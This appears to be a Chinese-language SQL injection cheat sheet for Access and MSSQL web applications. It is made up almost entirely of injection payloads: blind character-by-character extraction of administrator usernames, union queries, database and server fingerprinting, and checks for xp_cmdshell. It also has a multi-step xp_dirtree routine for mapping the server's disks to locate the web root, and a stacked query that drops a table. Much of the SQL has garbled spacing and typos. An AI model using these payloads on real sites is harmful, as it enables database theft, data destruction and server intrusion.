#用返回的对错猜测 and (select top 1len(user_name) from administrator)>xx
#如以下报错,可确定字段数目为5 http://xxx?id=14and (select top 1len(user_name) from administrator)>3 ●正常 http://xxx?id=14and (select top 1len(user_name) from administrator)>4 ●正常 http://xxx?id=14and (select top 1len(user_name) from administrator)>5 ●报错
猜解字段内容
1 2 3 4 5 6 7 8 9 10 11 12 13
and (select top 1 asc(mid(user_name,1,1)) from administrator)>xx
#先判断第一个字母,是汉字还是字母 ## 返回正常页面说明ASCII值大于0 ,是字母 http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>0
# 二分法确定acsii码, http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>100 http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>50 http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>75
#第二步:用*依次向前替换数字字段,直到页面显示正常。例如在5替换为*后页面返回正常 http://XXX?id=14unionselect1,2,3,4,* from administrator #说明星号替换了3个字段(也就是表中有三个字段),后续要使用inner jion自表连接查询,因此计算字段数乘以2是否小于当前列(3*2<7)
#第三步:公式成立的话,用inner jion自连接查询 http://XXX?id=14unionselect1,* from (administrator as a innerjoin administrator as b on a.id=b.id)
#如果是更多位,可再接innerjoin http://XXX?id=14unionselect1,* from ((administrator as a innerjoin administrator as b on a.id=b.id) innerjoin administrator as c a.id=c.id)
and @@version>0 # 从页面返回的错误信息中,可以得到数据库版本信息。 # 如果页面出错,但未返回可利用的信息,则说明MsSQL关闭了错误信息提示, # 在猜解数据库内容时,就不能用爆库的方法了,只能使用unionselect联合查询或盲注入攻击方法。
# 如下查询检测,获得更多的关于MsSQL注入点的信息。 ## 判断MsSQL支持多行语句查询 ;declare@dint # 是否支持子查询 and (selectcount (1) from [sysobjects])>=0 # 获取当前数据库用户名 anduser>O # 获取当前数据库名称 and db_name>0 # 当前数据库名 and l=convert (int,db_name ()) 或 1=(select db_name ()) # 本地服务名 and1=(select @@servername) # 判断是否有库读取权限 and1=(Select HAS_DBACCESS ('master'))
#mssql中用联合查询时判断显示位时必须要用null来代替1,2,3 并且可以用加'号的形式来确定输出位置 and 1=2 union all select null,null #查询表 and 1=2 union all select null,(select top 1 name from schemaname.dbo.sysobjects where xtype ='u') 其中xtype查询的是数据库中表是由谁创建的有 u 和 s 两个属性 sysobjects和mysql中的information_schema表相似 #查列 and 1=2 union all select null,(select top 1 col_name(object_id('tablename'),1) from sysobjects) #查数据 and 1=2 union all select null,(select top1 colnmae from tablename)
# 提交如下查询进行检测。查看xp_cmdshell、xp_regread扩展存储过程是否被删除。 and1=(Selectcount(*) FROM master. dbo.sysobjects Where xtype ='X'AND name ='xp_cmdshell') and1=(Selectcount(*) FROM master. dbo.sysobjects Where name ='xp_regread')
# 1. 删除表black;首先建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树 ,该表的dir字段表示目录的名称,depth字段表示目录的深度。 ;droptable black;create table temp(dir nvarchar (255), depth varchar(255),files varchar(255), id intnot nullidentity (1,1))-- # 2. 然后执行xp_dirtree获得D盘的目录树 ;insert into temp(dir,depth,files) exec master.dbo.xp_dirtree 'D:',1,1-- # 3. 查看D盘有几个文件夹,这样对D盘有个大致的了解 and (selectcount(*) from temp where depth=1and dir notin('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=数字(数字=0、1、2、3...) # 4. 接着在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断WEB根目录上是否存在此盘上 ## 看语句的返回结果,如果为真,表示WEB根目录有可能在此盘上 and (selectcount(*) from temp where dir<>'user')<(selectcount(*) from temp) and (selectcount(*) from temp where dir<>'photo')<(selectcount(*) from temp) # 5. 假设找到的WEB根目录在此盘上,用下面的语句来获得一级子目录的深度: ## 假设得到的depth是3,说明user目录是D盘的3级目录,则WEB根目录是D盘的二级目录。 and (select depth from temp where dir='user')>=数字 #数字=1、2、3... # 6. 接下来,另建一个临时表temp1,用来存放D盘的1级子目录下的所有目录 ;create table temp1(dir nvarchar(255),depth varchar(255));-- # 7. 然后把从D盘的第一个子目录下的所有目录存到temp1中 declare@dirnamevarchar(255);set@dirname='D:/'+(select top 1 dir from (select top 1 dir from temp where depth=1and dir notin('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') orderby dir desc)T orderby dir);insert into temp1 exec master.dbo.xp_dirtree @dirname # 8. temp1中已经保存了所有D盘第一级子目录下的所有目录,用同样的方法来判断根目录是否在此一级子目录下 ## 如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明WEB根目录不在此目录下 ## 用同样的方法来获得D盘第2、3...个子目录下的所有目录列表,来判断WEB根目录是否在其下。 ## 要注意,用xp_dirtree前一定要把temp1表中的内容删除。 and (selectcount(*) from temp1 where dir<>'user')<(selectcount(*) from temp1) # 9.假设WEB根目录在D盘的第一级子目录下,该子目录名称为website, ## 前面我们知道了WEB根目录的深度为2,我们需要知道website下到底哪个才是真正的WEB根目录。 ## 用同样的方法,再建立第3个临时表 temp2 ;create table temp2(dir nvarchar(255),depth varchar(255));-- # 10. 然后把从D盘的website下的所有目录存到temp2中 declare@dirnamevarchar(255);set@dirname='D:/website/'+(select top 1 dir from (select top 1 dir from temp1 where depth=1and dir notin('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') orderby dir desc)T orderby dir);insert into temp2 exec master.dbo.xp_dirtree @dirname # 11.用同样的方法判断该目录是否为根目录 ## 如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为WEB根目录。 and (selectcount(*) from temp2 where dir<>'user')<(selectcount(*) from temp2) 用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:/website/www # 12. 查询临时表中的内容,也就是指定的目录文件和文件夹名。由于不能一次性获取所有目录文件和文件夹名,因此需要更改id的值,依次列出文件和文件夹来。 and (select dir from temp where id=1)>0
# public权限检测 and db_name()=0-- # 1.获取mssql所有数据库名和路径 %20and%200=(select%20top%202%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%202%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--
# 2.获取当前数据库所有表名 and0<>(select top 1 name from testdb.dbo.sysobjects where xtype=0x7500and name notin (select top 2 name from testdb.dbo.sysobjects where xtype=0x7500))--